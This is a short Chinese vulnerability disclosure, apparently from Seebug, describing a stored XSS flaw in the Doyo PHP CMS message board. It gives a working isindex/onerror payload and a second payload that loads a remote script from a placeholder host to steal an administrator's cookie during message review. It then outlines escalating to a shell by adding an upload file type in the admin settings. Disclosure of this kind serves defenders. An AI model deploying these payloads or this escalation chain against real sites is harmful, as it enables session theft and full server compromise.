Doyo 建站储存型xss一枚

### 简要描述： rt ### 详细说明： doyo建站 免费开源的PHP建站系统，可广泛用于个人、企业、政府、机构等众多网站建设。 留言处。xss过滤不严。可以说是编辑器的问题。 插入如下代码 ``` <isindex type=image src=1 onerror=alert(/'xss'/)> ``` 后台审核时 触发了 [<img src="https://images.seebug.org/upload/201407/11002804db1c4c57e439fd89b34d7546df9678ab.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/11002804db1c4c57e439fd89b34d7546df9678ab.jpg) 可以插入 ``` <isindex type=image src=1 onerror=document.body.appendChild(document.createElement('script')).src='//xss.xxx.xxx'> ``` 盗取cookie [<img src="https://images.seebug.org/upload/201407/1100293491252968f62d326ccde9a9230d6b7f54.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/1100293491252968f62d326ccde9a9230d6b7f54.jpg) 后台系统设置 添加上传文件类型 即可 getshel [<img src="https://images.seebug.org/upload/201407/11003136918d53d8660f3a9536d982725c3c2cc7.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/11003136918d53d8660f3a9536d982725c3c2cc7.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/11002804db1c4c57e439fd89b34d7546df9678ab.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/11002804db1c4c57e439fd89b34d7546df9678ab.jpg)